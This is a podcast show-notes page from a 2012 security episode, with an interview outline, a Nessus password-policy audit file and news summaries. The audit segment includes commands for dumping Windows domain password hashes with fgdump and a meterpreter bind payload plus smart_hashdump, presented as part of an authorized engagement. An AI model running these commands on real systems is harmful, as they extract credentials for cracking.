Episode284

From Paul's Security Weekly
Revision as of 18:21, 19 April 2012 by Paul Asadoorian (Talk | contribs)

Jump to: navigation, search
Palo Alto Networks
Tenable Network Security
The SANS Institute
Pwnie Express
Black Hills Information Security
BlackSquirrel
Onapsis

Announcements & Shameless Plugs

PaulDotCom Security Weekly - Episode 283 for Thursday April 12th, 2012

  • DerbyCon Call for Papers and ticket registration is: coming up quickly - Friday May 4, 2012 at 10:00AM. The PaulDotCom crew will be in attendance for DerbyCon. Training begins Thursday September 27th and the DerbyCon conference runs the 28th thru 30th.
  • Security BSides everywhere: Iowa, London, Chicago, Austin, Charleston, more. http://www.securitybsides.com/ - We have 5 BSides tickets to give away! Listen to the instructions at the end of Episode 282 for complete details!

Interview: PureHate

Introduction

Martin “Pure Hate” Bos works as a penetration tester for Accuvant, is one of the core developers for Backtrack-Linux and is a Co-Founder of Question-Defense.com, a website dedicated to answering technical questions on a daily basis. He has the largest online WPA Cracking service on the web and most recently, Martin help found DerbyCon, the most Epic Con of all time. He's on the show to give us an update on training for DerbyCon and to talk BackTrack.


MartinBos.jpg

Questions

  1. Tell us about Derbycon, what are the goals of this year's conference? Why should people attend?
  2. Tickets are the hot topic lately, how will tickets work and what's the scoop for this year?
  3. How did you get your start in information security?
  4. Tell us about Question Defense and what was your motivation in creating the site?
  5. What is the most popular question you receive on the web site?
  6. What are some of the strangest questions you get on the web site?
  7. Why crack password hashes? I mean, if you can get the password hash, isn't it game over at that point?
  8. What are the most difficult passwords to crack?
  9. Tell us about password cracking setups, what's the most effective and easiest setup to create?
  10. What's the cost of that setup?
  11. Why does our Password Policy suck?
  12. What did you think of the recent "ZeroDay" discovered by the InfoSec institute?
  13. Why does Chris Hadnagy refer to you as "Pure Love"?

5 Questions:

1) Windows , OS X, Linux, or OS/2 Warp

2) In a game of ass grabby grabby, would you prefer to go first or second?

3) If you had to choose who to make out with from the following list: Jessica Alba, Dave Kennedy, or a female robot from your favorite Sci-fy flick

4) Three words to describe yourself

5) If you had to write a book about yourself, what would the title be?

Tech segment

Larry's Password Audit

Recently we were asked to do a password assessment for a customer, and they wanted to know what tools we used to do it and how it was done. The scope for the audit was fairly specific. The customer has a policy on Windows password complexity, length frequency of change, etc, and they wanted to see who was compliant with these policies - for whatever reason, they were not using GPO or the domain to enforce.

So we took two approaches. First was the local workstations and local accounts. We performed a credentialed Nessus scan with a custom policy and included the following plugins:

42898 SMB Registry : Stop the Registry Service after the scan (WMI)
10870 Login configurations
10917 SMB Scope
17351 Kerberos configuration
17651 Microsoft Windows SMB : Obtains the Password Policy
21745 Authentication Failure - Local Checks Not Run
35704 SMB Registry : Stop the Registry Service after the scan
10898 Microsoft WIndows - Users Information : Never changed password
12634 Authenticated Check: OS Name and Installed Package Enumeration
35706 SMB Registry : Stopping the Registry Service after the scan failed
10912 Microsoft Windows - Local Users Information : Can't change password
42897 SMB Registry : Start the Registry Service during the scan (WMI)
19506 Nessus Scan Information
35705 SMB Registry : Starting the Registry Service during the scan failed
10896 Microsoft Windows - Users Information : Can't change password
35703 SMB Registry : Start the Registry Service during the scan
21156 Windows Compliance Checks
10916 Microsoft Windows - Local Users Information : Passwords never expire
10900 Microsoft Windows - Users Information : Passwords never expires
10914 Microsoft Windows - Local Users Information : Never changed passwords


Secondly, we used a custom Nessus audit file to inspect the registry of each system. Because the customer had a mixed environment the policy addresses XP, Win 7, Server 2008 and Enterprise DCs all in one policy. Yes, this will have some false positives. but we can tell which OS failed for each host, and which one passes. In this combination, this should address all of the local, non-domain accounts.

Here's the audit file:

<check_type : "Windows" version : "2">

<group_policy: "CIS Windows XP Desktop">
# 2.1.1 Minimum Password Length: 8 Characters

<custom_item>
 type: PASSWORD_POLICY
 description: "XP 2.1.1 Minimum Password Length: 8 Characters"
 value_type: POLICY_DWORD
 value_data: [8..MAX]
 password_policy: MINIMUM_PASSWORD_LENGTH
 info  : "Larry Pesce - from CIS benchmarks"
</item>

# 2.1.2 Maximum Password Age: 90 Days

<custom_item>
 type: PASSWORD_POLICY
 description: "XP 2.1.2 Maximum Password Age: 90 Days"
 value_type: TIME_DAY
 value_data: [MIN..90]
 password_policy: MAXIMUM_PASSWORD_AGE
 info  : "Larry Pesce - from CIS benchmarks"
</item>

# 2.2.2.1 Minimum Password Age: 1 day

<custom_item>
 type: PASSWORD_POLICY
 description: "XP 2.2.2.1 Minimum Password Age: 1 day"
 value_type: TIME_DAY
 value_data: [1..MAX]
 password_policy: MINIMUM_PASSWORD_AGE
 info  : "Larry Pesce - from CIS benchmarks" 
</item>

# 2.2.2.2 Maximum Password Age: 90 days

<custom_item>
 type: PASSWORD_POLICY
 description: "XP 2.2.2.2 Maximum Password Age: 90 days"
 value_type: TIME_DAY
 value_data: [MIN..90]
 password_policy: MAXIMUM_PASSWORD_AGE
 info  : "Larry Pesce - from CIS benchmarks"
</item>

# 2.2.2.3 Minimum Password Length: 8 characters

<custom_item>
 type: PASSWORD_POLICY
 description: "XP 2.2.2.3 Minimum Password Length: 8 characters"
 value_type: POLICY_DWORD
 value_data: [8..MAX]
 password_policy: MINIMUM_PASSWORD_LENGTH
 info  : "Larry Pesce - from CIS benchmarks"
</item>

# 2.2.2.4 Password Complexity: Enabled

<custom_item>
 type: PASSWORD_POLICY
 description: "XP 2.2.2.4 Password Complexity: Enabled"
 value_type: POLICY_DWORD
 value_data: 1
 password_policy: COMPLEXITY_REQUIREMENTS
 info  : "Larry Pesce - from CIS benchmarks"
</item>

# 2.2.2.5 Password History: 24 passwords remembered

<custom_item>
 type: PASSWORD_POLICY
 description: "XP 2.2.2.5 Password History: 24 passwords remembered"
 value_type: POLICY_DWORD
 value_data: [24..MAX]
 password_policy: ENFORCE_PASSWORD_HISTORY
 info  : "Larry Pesce - from CIS benchmarks"
</item>

# 3.2.1.31 Interactive Logon: Prompt User to Change Password Before Expiration: 14 days




</group_policy>

<group_policy: "CIS Windows 7 Benchmark v1.1.0">

#	
## 1.1 Account Policies
#

<custom_item>
 type		: PASSWORD_POLICY
 description	: "Win7 1.1.1 Enforce Password History"
 info		: "Ensure a control is set up to prevent a password from being reused by an end user."
 info		: "CCE-8912-8"
 value_type	: POLICY_DWORD
 value_data	: [24..MAX]
 password_policy	: ENFORCE_PASSWORD_HISTORY
 info  : "Larry Pesce - from CIS benchmarks"
</custom_item>

<custom_item>
 type		: PASSWORD_POLICY
 description	: "Win7 1.1.2 Maximum Password Age"
 info		: "Ensure a control is set up that defines a limit on the number of days a password is valid before it expires."
 info		: "CCE-9193-4"
 value_type	: TIME_DAY
 value_data	: [MIN..90]
 password_policy	: MAXIMUM_PASSWORD_AGE
 info  : "Larry Pesce - from CIS benchmarks"
</custom_item>

<custom_item>
 type		: PASSWORD_POLICY
 description	: "Win7 1.1.3 Minimum Password Age"
 info		: "Ensure a control is set up that defines a limit on the number of days a password must be used before it can be changed."
 info		: "CCE-9330-2"
 value_type	: TIME_DAY
 value_data	: [1..MAX]
 password_policy	: MINIMUM_PASSWORD_AGE
 info  : "Larry Pesce - from CIS benchmarks"
</custom_item>

<custom_item>
 type		: PASSWORD_POLICY
 description	: "Win7 1.1.4 Minimum Password Length"
 info		: "Ensure a control is set up that defines a minimum number of characters a user password must contain."
 info		: "CCE-9357-5"
 value_type	: POLICY_DWORD
 value_data	: [8..MAX] 
 password_policy	: MINIMUM_PASSWORD_LENGTH
 info  : "Larry Pesce - from CIS benchmarks"
</custom_item>

<custom_item>
 type		: PASSWORD_POLICY
 description	: "Win 7 1.1.5 Password Must Meet Complexity Requirements"
 info		: "Ensure a control is in place that determines if passwords meet a certain level of complexity."
 info		: "CCE-9370-8"
 value_type	: POLICY_SET
 value_data	: "Enabled"
 password_policy	: COMPLEXITY_REQUIREMENTS
 info  : "Larry Pesce - from CIS benchmarks"
</custom_item>

</group_policy>	

<group_policy: "CIS Domain Controller Enterprise">

# 2.1.1 Minimum Password Length: 8 Characters

<custom_item>
 type: PASSWORD_POLICY
 description: "DC Enterprise 2.1.1 Minimum Password Length"
 info: "Setting the registry value so that 8 characters is the minimum alloted length of a password ensures that the computer is secured against input of the correct password by unknown users. This is a stepping stone for account lockout policy by preventing the user from accessing the computer without the correct password.
 "
 info: "Larry Pesce - from CIS benchmarks"
 info: "http://www.cisecurity.org/tools2/windows/CIS_Win2003_DC_Benchmark_v2.0.pdf"
 value_type: POLICY_DWORD
 value_data: [8..MAX]
 password_policy: MINIMUM_PASSWORD_LENGTH
</item>

# 2.1.2 Maximum Password Age: 42 Days

<custom_item>
 type: PASSWORD_POLICY
 description: "DC Enterprise 2.1.2 Maximum Password Age"
 info: "Having a password for only 42 days prevents said passwords from becoming an easy way to access the computer; one or more accounts being shared between users for personal needs, maintenance, or otherwise means that more and more people will know the password.
 "
 info: "Larry Pesce - from CIS benchmarks"
 info: "http://www.cisecurity.org/tools2/windows/CIS_Win2003_DC_Benchmark_v2.0.pdf"
 value_type: TIME_DAY
 value_data: [MIN..42]
 password_policy: MAXIMUM_PASSWORD_AGE
</item>
<custom_item>
 type: PASSWORD_POLICY
 description: "DC Enterprise 2.2.2.1 Minimum Password Age"
 info: "When the user may only change the password once per day, as opposed to as many times as desired, a buffer is created if a hacker attempts to change the user's password to escape detection or otherwise.
 "
 info: "Larry Pesce - from CIS benchmarks"
 info: "http://www.cisecurity.org/tools2/windows/CIS_Win2003_DC_Benchmark_v2.0.pdf"
 value_type: TIME_DAY
 value_data: [1..MAX]
 password_policy: MINIMUM_PASSWORD_AGE  
</item>

# 2.2.2.2 Maximum Password Age: 42 days

<custom_item>
 type: PASSWORD_POLICY
 description: "DC Enterprise 2.2.2.2 Maximum Password Age"
 info: "Having a password for only 42 days prevents said passwords from becoming an easy way to access the computer; one or more accounts being shared between users for personal needs, maintenance, or otherwise means that more and more people will know the password.
 "
 info: "Larry Pesce - from CIS benchmarks"
 info: "http://www.cisecurity.org/tools2/windows/CIS_Win2003_DC_Benchmark_v2.0.pdf"
 value_type: TIME_DAY
 value_data: [MIN..42]
 password_policy: MAXIMUM_PASSWORD_AGE
</item>

# 2.2.2.3 Minimum Password Length: 8 characters

<custom_item>
 type: PASSWORD_POLICY
 description: "DC Enterprise 2.2.2.3 Minimum Password Length"
 info: "Setting the registry value so that 8 characters is the minimum alloted length of a password ensures that the computer is secured against input of the correct password by unknown users. This is a stepping stone for account lockout policy by preventing the user from accessing the computer without the correct password.
 "
 info: "Larry Pesce - from CIS benchmarks"
 info: "http://www.cisecurity.org/tools2/windows/CIS_Win2003_DC_Benchmark_v2.0.pdf"
 value_type: POLICY_DWORD
 value_data: [8..MAX]
 password_policy: MINIMUM_PASSWORD_LENGTH
</item>

# 2.2.2.4 Password Complexity: Enabled

<custom_item>
 type: PASSWORD_POLICY
 description: "DC Enterprise 2.2.2.4 Password Complexity"
 info: "Complex passwords are essential in preventing random guesses of the passwords. Password complexity requires the user to include at least three of the following in the password, in addition to the password already being 8 characters long: upper and lower case letters, letters, numbers, and special characters. Special characters are non-alphanumeric symbols.
 "
 info: "Larry Pesce - from CIS benchmarks"
 info: "http://www.cisecurity.org/tools2/windows/CIS_Win2003_DC_Benchmark_v2.0.pdf"
 value_type: POLICY_DWORD
 value_data: 1
 password_policy: COMPLEXITY_REQUIREMENTS
</item>


# 2.2.2.5 Password History: 24 passwords remembered

<custom_item>
 type: PASSWORD_POLICY
 description: "DC Enterprise 2.2.2.5 Password History"
 info: "Prevents the user from repeating passwords when the passwords are changed. In conjunction with the maximum and minimum password lengths, the machine is very secure against random password guesses and intrusions with these settings enabled.
"
 info: "Larry Pesce - from CIS benchmarks"
 info: "http://www.cisecurity.org/tools2/windows/CIS_Win2003_DC_Benchmark_v2.0.pdf" 
 value_type: POLICY_DWORD
 value_data: [24..MAX]
 password_policy: ENFORCE_PASSWORD_HISTORY
</item>

</group_policy>	

<group_policy: "CIS Security Configuration Benchmark For Microsoft Windows Server 2008">

<custom_item>
 type		: PASSWORD_POLICY
 description	: "2K8 Server 1.1.1 Enforce password history (>=24)"
 info		: "This control defines the number of unique passwords a user must leverage before a previously used password can be reused."
 info		: "CCE-2237-6"
 info		: "Larry Pesce - from CIS benchmarks"
 value_type	: POLICY_DWORD
 value_data	: [24..MAX]
 password_policy: ENFORCE_PASSWORD_HISTORY
</custom_item>

<custom_item>
 type		: PASSWORD_POLICY
 description	: "2K8 Server 1.1.2 Maximum password age (<=90)"
 info		: "This control defines how many days a user can use the same password before it expires."
 info		: "CCE-2200-4"
 info		: "Larry Pesce - from CIS benchmarks"
 value_type	: TIME_DAY
 value_data	: [MIN..90]
 password_policy: MAXIMUM_PASSWORD_AGE
</custom_item>

<custom_item>
 type		: PASSWORD_POLICY
 description	: "2K8 Server 1.1.3 Minimum password age (>=1)"
 info		: "This control defines how many days a user must use the same password before it can be changed."
 info		: "CCE-1861-4"
 info		: "Larry Pesce - from CIS benchmarks"
 value_type	: TIME_DAY
 value_data	: [1..MAX]
 password_policy: MINIMUM_PASSWORD_AGE
</custom_item>

<custom_item>
 type		: PASSWORD_POLICY
 description	: "2K8 Server 1.1.4 Minimum password length (>=8)"
 info		: "This control defines the minimum number of characters a user password must contain."
 info		: "CCE-2240-0"
 info		: "Larry Pesce - from CIS benchmarks"
 value_type	: POLICY_DWORD
 value_data	: [8..MAX]
 password_policy: MINIMUM_PASSWORD_LENGTH
</custom_item>

<custom_item>
 type		: PASSWORD_POLICY
 description	: "2K8 Server 1.1.5 Password must meet complexity requirements"
 info		: "This control determines if new passwords are required to satisfy a certain level of complexity."
 info		: "CCE-2126-1"
 info		: "Larry Pesce - from CIS benchmarks"
 value_type	: POLICY_SET
 value_data	: "Enabled"
 password_policy: COMPLEXITY_REQUIREMENTS
</custom_item>

</group_policy>	


</check_type>


In order to deal with the domain accounts we've had to take a different approach: password cracking!

First to get ahold of the hashes we can use two methods, fgdump and metasploit. As part of the test we were given physical access and credentials to the PDC/Backup DC. First up fgdump:

fgdump.exe -h hostname -p password -u username

This can, in some cases give us a bunch of hashes back that we can take into Rcracki with rainbowtables from freerainbowtables.com

Another alternative that we have is to use metasploit. In this case we will create a meterpreter payload executable, copy it to the DC and execute it so that we can connect with metasploit. Let's get started!

First of the payload to copy:

./msfpayload windows/meterpreter/bind_tcp LPORT=4444 X > met-listen.exe

Then execute copy and exexute that on the DC. Then we need to connect from our metasploit instance to that meterpreter instance:

./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=<DC IP> LPORT=4444 E

Once we have a meterpreter session we want to use smart_hashdump, as this will intelligently figure out our DC version:

meterpreter> run smart_hashdump

Next, more hashes for use in rcracki and rainbowtables!

Stories

Paul's Stories

  1. Why You Should Turn Your Game Consoles Off - In addition to saving on your power bill, its a good idea to turn these devices off. Here's the thing, gaming consoles are computers like anything else, they carry personal information, financial information, and more. The military is interested in hacking game consoles. The reason? Check this out Officials wants to be able to keep tabs on live communications between a person using a modified console and whoever it is they are chatting with. They also want to be able to glean data from a used game console and obtain useful information about the prior owner's communications with other gamers..
  2. HP study finds widespread custom Web application flaws - While overall Web application flaws in commercially available applications has been in decline since 2006, a review of more than 359 unique custom Web applications conducted by HP Fortify paints a much different picture. Many of the custom Web applications were found rampant with common coding errors, leaving them prone to cross-site scripting and SQL injection attacks. Yea, the numbers are funny huh. Commercial web apps see a decline in vulnerabilities, but is that because they are patching them or not disclosing them, or both? However, internally written web apps, well, suck when it comes to security. But we see more of them, as its easier to find talent and use tools to create web applications. If you are in security in IT, listen to the interview with Gene Kim, its sound advice to get ahead of the curve, educate developers, and teach QA how to find flaws before apps go into production.
  3. Fun Hacking in a Bus - Traveling from New York to Toronto [Greyhound/Trailways] - Embedded device fail, on a bus! Default passwords lead to being able to configure the device and see what devices are connected via DHCP.
  4. Universal IPSec VPN client for Android 4.0 - VPNs are great, however if they are running on a platform that sucks at security, like Andriod, they give a false sense of security.
  5. Android Trojan distracts Japanese with anime and porn - And speaking of sucking, anime and porn lead to Android compromise, nice! The malware, specifically designed to target Japanese users, is hidden in apps which show internet-based video trailers. On installation, the malicious apps request the user grants them permission to read contact data and read phone state and identity which. If granted by the user, this will enable them to pilfer Android ID, phone number and the victim’s entire contacts list including names, email addresses and phone numbers.
  6. Techie gets naked to protest TSA - Talk about hacking naked! Check this out: Naturally, there were families with children present and expressions of shock and disgust were reportedly uttered. Because, of course, the naked human body is America's most pressing red-level threat.
  7. Should teachers and students be Facebook friends? - No, if you are a teacher, here is some advice: Don't be on Facebook.
  8. Compliance isn't security - Funny thing about compliance and security, they are two separate things.

Larry's Stories

John's Stories